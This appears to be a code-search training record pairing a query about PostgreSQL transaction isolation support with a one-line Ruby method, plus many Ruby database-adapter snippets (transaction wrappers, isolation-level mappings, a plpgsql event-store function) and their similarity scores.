"def aux_trigger?(id, energy)\n # can the coil be trigger from the given energy?\n energy.value >= @aux_trigger_energy[id]\n end",
"def on_change(*attributes, &block)\n on_update(*attributes.push([NotNil, NotNil]), &block)\n end",
"def trigger_function(type)\n case type\n when \"onClick\" then \"click\"\n when \"onChange\" then \"change\"\n when \"onFocus\" then \"focus\"\n when \"onFocusOut\" then \"blur\"\n else fail \"Undefined trigger function!\"\n end\n end",
"def supports_combining_alter_table_ops?\n true\n end",
"def field_changed? name\n send :\"#{name}_changed?\"\n end",
"def trigger(*names, &block)\n if block.nil?\n names.each do |name|\n convert_method_to_trigger(name)\n end\n else\n name = names.first\n define_trigger_action(*names, &block)\n define_trigger(name)\n store_trigger(name)\n end\n end",
"def trigger?\n !key.nil? && !key.name.nil?\n end",
"def signal\n @condition.signal\n true\n end",
"def signal\n @condition.signal\n true\n end",
"def supports_combining_alter_table_ops?\n false\n end",
"def __binding_condition__() @__binding_condition__ ||= LOCK.new_cond end",
"def child_condition; end",
"def triggers=(value)\n @triggers = value\n end",
"def trigger_for_index!(event_name, index, *passed_args)\n self.trigger_by_scope!(event_name, *passed_args) do |scope|\n # method_name, *args, block = scope\n method_name, args, block = split_scope(scope)\n\n result = case method_name\n when nil\n # no method name means the event was bound directly, we don't\n # want to trigger changed on the array its self.\n false\n when :[]\n # Extract the current index if its reactive\n arg_index = args[0].cur\n\n # TODO: we could handle negative indicies better\n arg_index == index.cur || arg_index < 0\n when :last\n index.cur == self.size-1\n when :first\n index.cur == 0\n when :size, :length\n # Size does not depend on the contents of the cells\n false\n else\n true\n end\n\n result = false if method_name == :reject\n\n result\n end\n end",
"def create_or_update_functions(db: EventSourcery::Postgres.config.event_store_database,\n function_name: EventSourcery::Postgres.config.write_events_function_name,\n events_table_name: EventSourcery::Postgres.config.events_table_name,\n aggregates_table_name: EventSourcery::Postgres.config.aggregates_table_name)\n db.run <<-SQL\ncreate or replace function #{function_name}(_aggregateId uuid,\n _eventTypes varchar[],\n _expectedVersion int,\n _bodies json[],\n _createdAtTimes timestamp without time zone[],\n _eventUUIDs uuid[],\n _correlationIds uuid[],\n _causationIds uuid[],\n _lockTable boolean) returns void as $$\ndeclare\ncurrentVersion int;\nbody json;\neventVersion int;\neventId text;\nindex int;\nnewVersion int;\nnumEvents int;\ncreatedAt timestamp without time zone;\nbegin\nnumEvents := array_length(_bodies, 1);\nselect version into currentVersion from #{aggregates_table_name} where aggregate_id = _aggregateId;\nif not found then\n -- when we have no existing version for this aggregate\n if _expectedVersion = 0 or _expectedVersion is null then\n -- set the version to 1 if expected version is null or 0\n insert into #{aggregates_table_name}(aggregate_id, version) values(_aggregateId, numEvents);\n currentVersion := 0;\n else\n raise 'Concurrency conflict. Current version: 0, expected version: %', _expectedVersion;\n end if;\nelse\n if _expectedVersion is null then\n -- automatically increment the version\n update #{aggregates_table_name} set version = version + numEvents where aggregate_id = _aggregateId returning version into newVersion;\n currentVersion := newVersion - numEvents;\n else\n -- increment the version if it's at our expected version\n update #{aggregates_table_name} set version = version + numEvents where aggregate_id = _aggregateId and version = _expectedVersion;\n if not found then\n -- version was not at expected_version, raise an error.\n -- currentVersion may not equal what it did in the database when the\n -- above update statement is executed (it may have been incremented by another\n -- process)\n raise 'Concurrency conflict. Last known current version: %, expected version: %', currentVersion, _expectedVersion;\n end if;\n end if;\nend if;\nindex := 1;\neventVersion := currentVersion + 1;\nif _lockTable then\n -- Ensure this transaction is the only one writing events to guarantee\n -- linear growth of sequence IDs.\n -- Any value that won't conflict with other advisory locks will work.\n -- The Postgres tracker currently obtains an advisory lock using it's\n -- integer row ID, so values 1 to the number of ESP's in the system would\n -- be taken if the tracker is running in the same database as your\n -- projections.\n perform pg_advisory_xact_lock(-1);\nend if;\nforeach body IN ARRAY(_bodies)\nloop\n if _createdAtTimes[index] is not null then\n createdAt := _createdAtTimes[index];\n else\n createdAt := now() at time zone 'utc';\n end if;\n\n insert into #{events_table_name}\n (uuid, aggregate_id, type, body, version, correlation_id, causation_id, created_at)\n values\n (\n _eventUUIDs[index],\n _aggregateId,\n _eventTypes[index],\n body,\n eventVersion,\n _correlationIds[index],\n _causationIds[index],\n createdAt\n )\n returning id into eventId;\n\n eventVersion := eventVersion + 1;\n index := index + 1;\nend loop;\nperform pg_notify('new_event', eventId);\nend;\n$$ language plpgsql;\nSQL\n end",
"def trigger_changed\n trigger(:position_changed , self )\n end",
"def cond=(_arg0); end",
"def cond=(_arg0); end",
"def cond=(_arg0); end"
] |
[
"0.6295187",
"0.6269034",
"0.6183004",
"0.6004594",
"0.5989614",
"0.59486556",
"0.58836603",
"0.5881881",
"0.58626014",
"0.5818532",
"0.5760473",
"0.56977266",
"0.5681853",
"0.56244934",
"0.56173915",
"0.5532288",
"0.55016947",
"0.5458493",
"0.5457816",
"0.5444176",
"0.5434759",
"0.54202104",
"0.54171866",
"0.54171866",
"0.54087085",
"0.5407802",
"0.5366377",
"0.53103137",
"0.5267984",
"0.52668786",
"0.5256893",
"0.5241712",
"0.5241712",
"0.52366465",
"0.52366465",
"0.52366465",
"0.5221638",
"0.5204111",
"0.51768506",
"0.51700354",
"0.51614153",
"0.51572055",
"0.5139394",
"0.5129916",
"0.5129154",
"0.51179177",
"0.51160353",
"0.5099704",
"0.5099704",
"0.5092791",
"0.5089902",
"0.5082192",
"0.5080119",
"0.5079834",
"0.5056199",
"0.505183",
"0.50505954",
"0.5037222",
"0.5033494",
"0.49914587",
"0.49879918",
"0.49872965",
"0.49818203",
"0.49610168",
"0.49299723",
"0.49007812",
"0.48994353",
"0.48941562",
"0.4893361",
"0.4893361",
"0.48905185",
"0.48888227",
"0.48859033",
"0.4868557",
"0.4856742",
"0.48432806",
"0.4834467",
"0.48176914",
"0.47959778",
"0.47936317",
"0.477622",
"0.4776143",
"0.4761153",
"0.47368026",
"0.47292054",
"0.47159985",
"0.47128794",
"0.4705554",
"0.4698165",
"0.4698165",
"0.46937862",
"0.46801925",
"0.46758687",
"0.4675491",
"0.4675159",
"0.46692994",
"0.46673414",
"0.46492487",
"0.46492487",
"0.46492487"
] |
0.62159413
|
2
|
PostgreSQL supports prepared transactions (two-phase commit) if max_prepared_transactions is greater than 0.
|
def supports_prepared_transactions?
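  # Memoized check: PREPARE TRANSACTION (two-phase commit) only works when the
  # server's max_prepared_transactions setting is greater than zero.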
  return @supports_prepared_transactions if defined?(@supports_prepared_transactions)
  @supports_prepared_transactions = self['SHOW max_prepared_transactions'].get.to_i > 0
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def supports_prepared_transactions?\n false\n end",
"def on_prepare_transaction_commit(unit, transaction); end",
"def commit_transaction(conn, opts=OPTS)\n if (s = opts[:prepare]) && savepoint_level(conn) <= 1\n log_connection_execute(conn, \"PREPARE TRANSACTION #{literal(s)}\")\n else\n super\n end\n end",
"def allow_preparing_prepared_statements?\n false\n end",
"def test_transactions(table=\"test_monetdb_transactions\", columndefs=['col1 INT', 'col2 VARCHAR(255)'])\n test_create_table(table, columndefs)\n \n data = [1, 'aa'] \n values = \"\"\n \n data.each do |d| values += '\\'' + d.to_s + '\\'' + ',' end\n values = values.chop # remove last ',' character \n \n insert = \"INSERT INTO \" + table + \" VALUES \" + \" ( \" + values + \" )\"\n \n @db.query('START TRANSACTION')\n @db.auto_commit(flag=false) # if @db.auto_commit?\n @db.query(insert)\n\n @db.query(\"COMMIT\") \n \n res = @db.query('SELECT * FROM ' + table)\n rows_committed = res.fetch_all\n res.free\n \n # create a save point\n @db.save\n @db.query(\"SAVEPOINT #{@db.transactions} ;\")\n \n @db.query(insert)\n \n # rollback to savepoint\n @db.query(\"ROLLBACK TO SAVEPOINT #{@db.transactions};\")\n @db.release\n \n res = @db.query('SELECT * FROM ' + table)\n rows_rolled_back = res.fetch_all\n res.free\n \n assert_equal(rows_committed, rows_rolled_back)\n \n # restore autocommit for remaining tests\n @db.auto_commit(flag=true) \n end",
"def supports_savepoints_in_prepared_transactions?\n supports_prepared_transactions? && supports_savepoints?\n end",
"def transaction\n @pool.hold do |conn|\n @transactions ||= []\n if @transactions.include? Thread.current\n return yield(conn)\n end\n conn.execute(SQL_BEGIN)\n begin\n @transactions << Thread.current\n result = yield(conn)\n conn.execute(SQL_COMMIT)\n result\n rescue => e\n conn.execute(SQL_ROLLBACK)\n raise e unless Error::Rollback === e\n ensure\n @transactions.delete(Thread.current)\n end\n end\n end",
"def use_transactions; end",
"def use_transactions; end",
"def transaction\n @pool.hold do |conn|\n @transactions ||= []\n if @transactions.include? Thread.current\n return yield(conn)\n end\n log_info(SQL_BEGIN)\n conn.execute(SQL_BEGIN)\n begin\n @transactions << Thread.current\n yield(conn)\n rescue Exception => e\n log_info(SQL_ROLLBACK)\n conn.execute(SQL_ROLLBACK)\n raise e unless Error::Rollback === e\n ensure\n unless e\n log_info(SQL_COMMIT)\n conn.execute(SQL_COMMIT)\n end\n @transactions.delete(Thread.current)\n end\n end\n end",
"def prepared_statements\n false\n end",
"def on_prepare_commit(unit, aggregates, events); end",
"def commit_transaction_sql\n SQL_COMMIT\n end",
"def commit_transaction_sql\n SQL_COMMIT\n end",
"def initial_commit?; end",
"def initial_commit?; end",
"def transaction\n start_transaction!\n\n result = yield\n\n query 'COMMIT'\n\n result\n rescue\n query 'ROLLBACK'\n raise\n\n ensure\n end_transaction!\n end",
"def run_transaction(conn, op)\n retries = 0\n max_retries = 3\n while true\n retries += 1\n if retries == max_retries\n err = \"Transaction did not succeed after #{retries} retries\"\n raise err\n end\n\n begin\n op.call(conn)\n\n # If we reach this point, we were able to commit, so we break\n # from the retry loop.\n break\n\n rescue PG::TRSerializationFailure\n # This is a retry error, so we roll back the current\n # transaction and sleep for a bit before retrying. The\n # sleep time increases for each failed transaction.\n # conn.rollback\n puts \"EXECUTE SERIALIZATION_FAILURE BRANCH\"\n sleep_secs = (2**retries).floor\n puts \"Sleeping for #{sleep_secs} seconds\"\n sleep(sleep_secs)\n next\n end\n end\nend",
"def transaction_with_timeout\n db.transaction do\n begin\n db.run(\"SET statement_timeout TO #{statement_timeout}\") if statement_timeout\n yield db\n db.run('SET statement_timeout TO DEFAULT')\n end\n end\n end",
"def transaction(&block)\n yield\n commit\n end",
"def statements_prepared(conn)\n @statement_mutex.synchronize do\n @statements_prepared ||= {}\n @statements_prepared[conn] ||= {}\n end\n end",
"def begin_transaction_sql\n SQL_BEGIN\n end",
"def begin_transaction_sql\n SQL_BEGIN\n end",
"def within_transaction; end",
"def within_transaction; end",
"def checked_transaction(opts=OPTS)\n use_transaction?(opts) ? db.transaction({:server=>this_server}.merge!(opts)){yield} : yield\n end",
"def checked_transaction(opts=OPTS)\n use_transaction?(opts) ? db.transaction({:server=>this_server}.merge!(opts)){yield} : yield\n end",
"def begin_db_transaction\n execute(\"BEGIN\")\n end",
"def begin_db_transaction\n execute(\"BEGIN\")\n end",
"def begin_db_transaction\n # PG driver doesn't really do anything on setAutoCommit(false)\n # except for commit-ing a previous pending transaction if any\n log('/* BEGIN */') { @connection.begin }\n end",
"def transaction(&block); end",
"def begin_db_transaction() end",
"def begin_db_transaction() end",
"def transaction\n start\n yield self\n rescue Object => ex\n rollback\n debug \"#{ex.class}: #{ex.message}\"\n ex.backtrace.each { |line| debug line }\n else\n commit\n end",
"def with_optional_transaction(bool, &block)\n bool ? transaction { yield } : yield\n end",
"def commit_db_transaction() end",
"def commit_db_transaction() end",
"def transaction(start_db_transaction=true)\n yield\n end",
"def begin_db_transaction\n @connection.autocommit = false\n end",
"def commit_required?; end",
"def test_commit_empty()\n t = Scalaroid::Transaction.new()\n t.commit()\n t.close_connection()\n end",
"def testCommit_Empty()\n t = Scalaris::Transaction.new()\n t.commit()\n t.close_connection()\n end",
"def testCommit_Empty()\n t = Scalaris::Transaction.new()\n t.commit()\n t.close_connection()\n end",
"def transaction; end",
"def transaction; end",
"def transaction; end",
"def transaction(&block)\n @in_transaction += 1\n begin\n yield self\n self.commit if @in_transaction > 0\n rescue => e\n self.rollback\n raise e\n ensure\n @in_transaction -= 1 unless @in_transaction == 0\n end\n end",
"def in_transaction(opts = {})\n yield\n end",
"def restart_transaction\n ActiveRecord::Base.connection.execute(\"COMMIT\")\n ActiveRecord::Base.connection.execute(\"BEGIN\")\n end",
"def transaction( &block )\n connect do | conn |\n conn.transaction do | conn |\n yield SqlRunner.new(SingleConnectionPool.new( conn ))\n end\n end\n end",
"def with_transaction\n ActiveRecord::Base.transaction { yield }\n end",
"def execute_prepared_statement(conn, name, opts=OPTS, &block)\n ps = prepared_statement(name)\n sql = ps.prepared_sql\n ps_name = name.to_s\n\n if args = opts[:arguments]\n args = args.map{|arg| bound_variable_arg(arg, conn)}\n end\n\n unless conn.prepared_statements[ps_name] == sql\n conn.execute(\"DEALLOCATE #{ps_name}\") if conn.prepared_statements.include?(ps_name)\n conn.check_disconnect_errors{log_connection_yield(\"PREPARE #{ps_name} AS #{sql}\", conn){conn.prepare(ps_name, sql)}}\n conn.prepared_statements[ps_name] = sql\n end\n\n log_sql = \"EXECUTE #{ps_name}\"\n if ps.log_sql\n log_sql += \" (\"\n log_sql << sql\n log_sql << \")\"\n end\n\n q = conn.check_disconnect_errors{log_connection_yield(log_sql, conn, args){_execute_prepared_statement(conn, ps_name, args, opts)}}\n begin\n block_given? ? yield(q) : q.cmd_tuples\n ensure\n q.clear if q && q.respond_to?(:clear)\n end\n end",
"def transaction\n raise Mysql2::Error, 2002 if @my.nil?\n\n if block_given?\n begin\n @my.query('START TRANSACTION WITH CONSISTENT SNAPSHOT')\n yield # Start executing the query black.\n @my.query('COMMIT')\n rescue Mysql2::Error => e\n @my.query('ROLLBACK')\n raise e\n end\n end\n end",
"def commit_db_transaction\n execute(\"COMMIT\")\n end",
"def commit_db_transaction\n execute(\"COMMIT\")\n end",
"def supports_transaction_isolation?\n true\n end",
"def transaction\n raise Mysql::Error, 'Not Connected' if @my.nil?\n\n if block_given?\n begin\n @my.query('START TRANSACTION WITH CONSISTENT SNAPSHOT')\n yield # Start executing the query black.\n @my.query('COMMIT')\n rescue Mysql::Error => e\n @my.query('ROLLBACK')\n raise e\n end\n end\n end",
"def transaction(opts = {})\n commit, rollback = start_transaction! opts\n tx_depth = nil\n begin\n if Pacer.verbose == :very\n tx_depth = threadlocal_graph_info[:dx_depth]\n puts \"--#{self.class.name} transaction #{ tx_depth } --> \"\n puts caller[0,3]\n end\n r = yield commit, rollback\n commit.call(false)\n r\n rescue Exception => e\n rollback.call e.message\n raise\n ensure\n puts \"--#{self.class.name} #{ tx_depth } <-- \" if Pacer.verbose == :very\n finish_transaction!\n end\n end",
"def supports_ddl_transactions?\n false\n end",
"def supports_ddl_transactions?\n false\n end",
"def supports_ddl_transactions?\n false\n end",
"def prepared_statement(name)\n Sequel.synchronize{prepared_statements[name]}\n end",
"def commit_transaction(conn)\n log_connection_execute(conn, commit_transaction_sql) unless Thread.current[:sequel_transaction_depth] > 1\n end",
"def begin_transaction(conn, opts={})\n log_yield(TRANSACTION_BEGIN){conn.setAutoCommit(false)}\n conn\n end",
"def prepare!\n prepare_once\n @total_rows_number = postgres.execute(\"SELECT COUNT('id') FROM #{data_table_name} WHERE #{data_where_scope}\")[0][0].to_i\n @iteration_number = 0\n @finished = false\n @prepared = true\n end",
"def _execute_prepared_statement(conn, ps_name, args, opts)\n conn.exec_prepared(ps_name, args)\n end",
"def within_transaction\n if use_transaction\n first.within_transaction do\n yield\n success?\n end\n else\n yield\n end\n end",
"def autocommit?()\n #This is a stub, used for indexing\n end",
"def prepare(*)\n raise Error, \"cannot prepare an already prepared statement\" unless allow_preparing_prepared_statements?\n super\n end",
"def begin_new_transaction(conn, opts)\n super\n if opts.has_key?(:synchronous)\n case sync = opts[:synchronous]\n when true\n sync = :on\n when false\n sync = :off\n when nil\n return\n end\n\n log_connection_execute(conn, \"SET LOCAL synchronous_commit = #{sync}\")\n end\n end",
"def execute_prepared_statement(ps_name, opts)\n args = opts[:arguments]\n ps = prepared_statement(ps_name)\n sql = ps.prepared_sql\n synchronize(opts[:server]) do |conn|\n unless conn.prepared_statements.fetch(ps_name, []).first == sql\n log_connection_yield(\"PREPARE #{ps_name}: #{sql}\", conn){conn.prepare(sql, ps_name)}\n end\n args = args.map{|v| v.nil? ? nil : prepared_statement_arg(v)}\n log_sql = \"EXECUTE #{ps_name}\"\n if ps.log_sql\n log_sql += \" (\"\n log_sql << sql\n log_sql << \")\"\n end\n begin\n stmt = log_connection_yield(log_sql, conn, args){conn.execute_prepared(ps_name, *args)}\n if block_given?\n yield(stmt)\n else \n stmt.affected\n end\n ensure\n stmt.free_result if stmt\n end\n end\n end",
"def commit_transaction(conn, opts=OPTS)\n if in_savepoint?(conn)\n if supports_releasing_savepoints?\n log_connection_yield('Transaction.release_savepoint', conn){conn.release_savepoint(savepoint_obj(conn))}\n end\n else\n log_connection_yield('Transaction.commit', conn){conn.commit}\n end\n end",
"def rollback_db_transaction() end",
"def rollback_db_transaction() end",
"def within_transaction\n if use_transactions && !empty?\n first.within_transaction do\n yield\n success?\n end\n else\n yield\n end\n end",
"def supports_transactional_ddl?\n true\n end",
"def lint_transaction_support\n result = gateway_instance.transaction { 1 }\n\n complain \"#{gateway_instance} must return the result of a transaction block\" if result != 1\n\n gateway_instance.transaction do |t|\n t.rollback!\n\n complain \"#{gateway_instance} must interrupt a transaction on rollback\"\n end\n end",
"def auto_commit?\n\t\t@connection.auto_commit?\n\tend",
"def commit( transaction )\n fail NotImplementedError\n end",
"def supports_transactional_ddl?\n false\n end",
"def begin_db_transaction\n @transaction = @connection.transaction('READ COMMITTED')\n end",
"def supports_transaction_isolation?\n false\n end",
"def supports_transaction_isolation?\n false\n end",
"def with_connection\n ActiveRecord::Base.connection_pool.with_connection do |connection|\n connection.transaction do\n if connection.adapter_name == \"PostgreSQL\"\n connection.execute \"SET TRANSACTION READ ONLY\"\n connection.execute \"SET LOCAL statement_timeout = 100\"\n # TODO support equivalent options for other adapters (such as mysql)\n end\n\n yield connection\n end\n end\n end",
"def transaction(options={}, &block)\n connection.transaction(options.update(:requires_new => true), &block)\n end",
"def transaction\n use do |connection|\n connection.transaction do |conn|\n begin\n yield conn\n rescue Rollback\n return\n end\n end\n end\n end",
"def commit_transaction(conn, opts={})\n log_yield(TRANSACTION_COMMIT){conn.commit}\n end",
"def transaction\n start_transaction\n\n yield\n ensure\n end_transaction if transaction_started?\n end",
"def begin_transaction\n return System.begin_transaction\n end",
"def transaction(&block)\n yield\n end",
"def transaction(&block)\n yield\n end",
"def transaction(opts={:auto_enable => false})\n @transaction_level||=0\n @transaction_level+=1\n session do\n raise_if_transaction_running\n @transaction ||= true\n raise Error.cannot_obtain_transaction_lock if not lock_transaction\n begin\n yield\n # get_transaction in case cfgsave or cfgenable was run in transaction block\n # if there is no transaction we do not need to run it\n # if there is transaction but opend by someone else then t\n cfg_save if @transaction_level==1 && get_transaction\n rescue => e\n abort_transaction\n raise e\n end \n end\n ensure\n @transaction_level-=1\n @transaction = nil if @transaction_level==0\n end",
"def begin_transaction(conn, opts=OPTS)\n if in_savepoint?(conn)\n _trans(conn)[:savepoints][-1][:obj] = log_connection_yield('Transaction.savepoint', conn){conn.set_savepoint}\n else\n log_connection_yield('Transaction.begin', conn){conn.setAutoCommit(false)}\n set_transaction_isolation(conn, opts)\n end\n end",
"def start_transaction!\n fail DbMod::Exceptions::AlreadyInTransaction if @in_transaction\n @in_transaction = true\n\n query 'BEGIN'\n end",
"def TransactionBegin()\n\t@dbh.do(\"BEGIN\")\nend",
"def auto_commit?\n @connection.auto_commit?\n end",
"def remove_transaction(conn, committed)\n conn.autocommit = true\n ensure\n super\n end",
"def locked_transaction(&block)\n unless connection.open_transactions.zero?\n raise \"locked_transaction cannot be called from within another transaction!\"\n end\n unsafe_locked_transaction do\n yield if block_given?\n end\n end",
"def execute_prepared_statement(name, args)\n check_disconnect_errors{exec_prepared(name, args)}\n end",
"def begin\n db.transaction do\n yield\n end\n end"
] |
[
"0.7779416",
"0.67318296",
"0.66393447",
"0.6488887",
"0.64478713",
"0.642692",
"0.62858105",
"0.6274448",
"0.6274448",
"0.62604916",
"0.6229228",
"0.6184096",
"0.6167285",
"0.6167285",
"0.61652166",
"0.61652166",
"0.60421",
"0.59701645",
"0.5968591",
"0.59547496",
"0.592801",
"0.5924486",
"0.5924486",
"0.59016067",
"0.59016067",
"0.5891991",
"0.5891991",
"0.587547",
"0.587547",
"0.587391",
"0.58325875",
"0.57965916",
"0.57965916",
"0.57919526",
"0.57857233",
"0.57477444",
"0.57477444",
"0.57421106",
"0.57363385",
"0.57304704",
"0.5729876",
"0.57084495",
"0.57084495",
"0.5697033",
"0.5697033",
"0.5697033",
"0.5694134",
"0.56853026",
"0.5677191",
"0.5676279",
"0.5673022",
"0.5663831",
"0.56530476",
"0.5634543",
"0.5634543",
"0.5628902",
"0.5623996",
"0.56233305",
"0.5623172",
"0.5623172",
"0.5623172",
"0.561547",
"0.56124806",
"0.5609747",
"0.5589336",
"0.55842215",
"0.55837697",
"0.55824804",
"0.5579749",
"0.557821",
"0.55689186",
"0.55500233",
"0.55407214",
"0.55407214",
"0.5539981",
"0.55376256",
"0.5536491",
"0.5527239",
"0.5509658",
"0.55059713",
"0.55016106",
"0.5494956",
"0.5494956",
"0.5485136",
"0.548384",
"0.5474253",
"0.5473428",
"0.54596865",
"0.5452422",
"0.5451877",
"0.5451877",
"0.5449678",
"0.5440156",
"0.5429976",
"0.54296666",
"0.54266626",
"0.54245657",
"0.5421951",
"0.54215723",
"0.5411578"
] |
0.7233213
|
1
|
PostgreSQL supports transaction isolation levels.
|
def supports_transaction_isolation_levels?
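  # PostgreSQL accepts all four SQL-standard levels via SET TRANSACTION ISOLATION LEVEL.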
  true
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def supports_transaction_isolation?\n true\n end",
"def supports_transaction_isolation_levels?\n true\n end",
"def run_in_transaction isolation\n if isolation\n Base.transaction isolation: isolation do\n yield\n end\n else\n yield\n end\n end",
"def run_in_transaction isolation\n if isolation\n Base.transaction isolation: isolation do\n yield\n end\n else\n yield\n end\n end",
"def supports_transaction_isolation_levels?\n false\n end",
"def transaction\n @pool.hold do |conn|\n @transactions ||= []\n if @transactions.include? Thread.current\n return yield(conn)\n end\n conn.execute(SQL_BEGIN)\n begin\n @transactions << Thread.current\n result = yield(conn)\n conn.execute(SQL_COMMIT)\n result\n rescue => e\n conn.execute(SQL_ROLLBACK)\n raise e unless Error::Rollback === e\n ensure\n @transactions.delete(Thread.current)\n end\n end\n end",
"def supports_transaction_isolation?\n false\n end",
"def supports_transaction_isolation?\n false\n end",
"def within_transaction; end",
"def within_transaction; end",
"def transaction\n @pool.hold do |conn|\n @transactions ||= []\n if @transactions.include? Thread.current\n return yield(conn)\n end\n log_info(SQL_BEGIN)\n conn.execute(SQL_BEGIN)\n begin\n @transactions << Thread.current\n yield(conn)\n rescue Exception => e\n log_info(SQL_ROLLBACK)\n conn.execute(SQL_ROLLBACK)\n raise e unless Error::Rollback === e\n ensure\n unless e\n log_info(SQL_COMMIT)\n conn.execute(SQL_COMMIT)\n end\n @transactions.delete(Thread.current)\n end\n end\n end",
"def transaction_isolation_levels\n {\n read_committed: 'READ COMMITTED',\n repeatable_read: 'REPEATABLE READ',\n serializable: 'SERIALIZABLE'\n }\n end",
"def test_supports_transaction_isolation\n assert ActiveRecord::Base.connection.supports_transaction_isolation?\n\n assert ActiveRecord::Base.connection.supports_transaction_isolation_level?(:read_uncommitted)\n assert ActiveRecord::Base.connection.supports_transaction_isolation_level?(:read_committed)\n assert ActiveRecord::Base.connection.supports_transaction_isolation_level?(:repeatable_read)\n assert ActiveRecord::Base.connection.supports_transaction_isolation_level?(:serializable)\n end",
"def with_transaction\n ActiveRecord::Base.transaction { yield }\n end",
"def begin_isolated_db_transaction(isolation)\n @connection.transaction transaction_isolation_levels.fetch(isolation, isolation)\n end",
"def supports_transaction_isolation_levels?\n synchronize{|conn| conn.getMetaData.supportsTransactionIsolationLevel(JavaSQL::Connection::TRANSACTION_SERIALIZABLE)}\n end",
"def transaction; end",
"def transaction; end",
"def transaction; end",
"def use_transactions; end",
"def use_transactions; end",
"def begin_isolated_db_transaction(isolation)\n name = isolation.to_s.upcase; name.sub!('_', ' ')\n log(\"/* BEGIN */; SET TRANSACTION ISOLATION LEVEL #{name}\") do\n @connection.begin(isolation)\n end\n end",
"def transaction\n start_transaction!\n\n result = yield\n\n query 'COMMIT'\n\n result\n rescue\n query 'ROLLBACK'\n raise\n\n ensure\n end_transaction!\n end",
"def transaction\n raise Mysql2::Error, 2002 if @my.nil?\n\n if block_given?\n begin\n @my.query('START TRANSACTION WITH CONSISTENT SNAPSHOT')\n yield # Start executing the query black.\n @my.query('COMMIT')\n rescue Mysql2::Error => e\n @my.query('ROLLBACK')\n raise e\n end\n end\n end",
"def begin_db_transaction() end",
"def begin_db_transaction() end",
"def transaction\n raise Mysql::Error, 'Not Connected' if @my.nil?\n\n if block_given?\n begin\n @my.query('START TRANSACTION WITH CONSISTENT SNAPSHOT')\n yield # Start executing the query black.\n @my.query('COMMIT')\n rescue Mysql::Error => e\n @my.query('ROLLBACK')\n raise e\n end\n end\n end",
"def begin\n db.transaction do\n yield\n end\n end",
"def transaction(&block); end",
"def begin_db_transaction\n @transaction = @connection.transaction('READ COMMITTED')\n end",
"def perform_atomic_update(&block)\n Edition.connection.execute \"set transaction isolation level serializable\"\n Edition.connection.transaction do\n yield\n end\n end",
"def supports_transaction_isolation_level?(level)\n @connection.supports_transaction_isolation?(level)\n end",
"def transaction( &block )\n connect do | conn |\n conn.transaction do | conn |\n yield SqlRunner.new(SingleConnectionPool.new( conn ))\n end\n end\n end",
"def transaction(&block)\n raise InvalidDbError if @stale\n\n return transaction_in_staging(true, &block) if self.staging?\n\n begin\n transaction_in_staging(false, &block)\n ensure\n self.unstage\n end\n end",
"def transaction\n @database.transaction { yield self }\n end",
"def transaction\n start\n yield self\n rescue Object => ex\n rollback\n debug \"#{ex.class}: #{ex.message}\"\n ex.backtrace.each { |line| debug line }\n else\n commit\n end",
"def transaction\n begin\n if block_given?\n begin_db_transaction\n result = yield\n commit_db_transaction\n result\n end\n rescue Exception => database_transaction_rollback\n rollback_db_transaction\n raise\n end\n end",
"def begin_transaction\n return System.begin_transaction\n end",
"def transaction(&block)\n @in_transaction += 1\n begin\n yield self\n self.commit if @in_transaction > 0\n rescue => e\n self.rollback\n raise e\n ensure\n @in_transaction -= 1 unless @in_transaction == 0\n end\n end",
"def transaction(object)\n object.db.transaction {raise ::Sequel::Error::Rollback unless yield}\n end",
"def transaction(&block)\n yield\n commit\n end",
"def transaction\n use do |connection|\n connection.transaction do |conn|\n begin\n yield conn\n rescue Rollback\n return\n end\n end\n end\n end",
"def transaction(start_db_transaction=true)\n yield\n end",
"def begin_isolated_db_transaction(isolation)\n log(\"BEGIN ISOLATED - #{isolation}\", 'TRANSACTION') { @connection.begin(isolation) }\n end",
"def test_transactions(table=\"test_monetdb_transactions\", columndefs=['col1 INT', 'col2 VARCHAR(255)'])\n test_create_table(table, columndefs)\n \n data = [1, 'aa'] \n values = \"\"\n \n data.each do |d| values += '\\'' + d.to_s + '\\'' + ',' end\n values = values.chop # remove last ',' character \n \n insert = \"INSERT INTO \" + table + \" VALUES \" + \" ( \" + values + \" )\"\n \n @db.query('START TRANSACTION')\n @db.auto_commit(flag=false) # if @db.auto_commit?\n @db.query(insert)\n\n @db.query(\"COMMIT\") \n \n res = @db.query('SELECT * FROM ' + table)\n rows_committed = res.fetch_all\n res.free\n \n # create a save point\n @db.save\n @db.query(\"SAVEPOINT #{@db.transactions} ;\")\n \n @db.query(insert)\n \n # rollback to savepoint\n @db.query(\"ROLLBACK TO SAVEPOINT #{@db.transactions};\")\n @db.release\n \n res = @db.query('SELECT * FROM ' + table)\n rows_rolled_back = res.fetch_all\n res.free\n \n assert_equal(rows_committed, rows_rolled_back)\n \n # restore autocommit for remaining tests\n @db.auto_commit(flag=true) \n end",
"def run_transaction(conn, op)\n retries = 0\n max_retries = 3\n while true\n retries += 1\n if retries == max_retries\n err = \"Transaction did not succeed after #{retries} retries\"\n raise err\n end\n\n begin\n op.call(conn)\n\n # If we reach this point, we were able to commit, so we break\n # from the retry loop.\n break\n\n rescue PG::TRSerializationFailure\n # This is a retry error, so we roll back the current\n # transaction and sleep for a bit before retrying. The\n # sleep time increases for each failed transaction.\n # conn.rollback\n puts \"EXECUTE SERIALIZATION_FAILURE BRANCH\"\n sleep_secs = (2**retries).floor\n puts \"Sleeping for #{sleep_secs} seconds\"\n sleep(sleep_secs)\n next\n end\n end\nend",
"def transaction(mode = :deferred, &block)\n @db.transaction(mode, &block)\n end",
"def with_connection\n ActiveRecord::Base.connection_pool.with_connection do |connection|\n connection.transaction do\n if connection.adapter_name == \"PostgreSQL\"\n connection.execute \"SET TRANSACTION READ ONLY\"\n connection.execute \"SET LOCAL statement_timeout = 100\"\n # TODO support equivalent options for other adapters (such as mysql)\n end\n\n yield connection\n end\n end\n end",
"def transaction\n start_transaction\n\n yield\n ensure\n end_transaction if transaction_started?\n end",
"def begin_db_transaction\n @connection.autocommit = false\n end",
"def restart_transaction\n ActiveRecord::Base.connection.execute(\"COMMIT\")\n ActiveRecord::Base.connection.execute(\"BEGIN\")\n end",
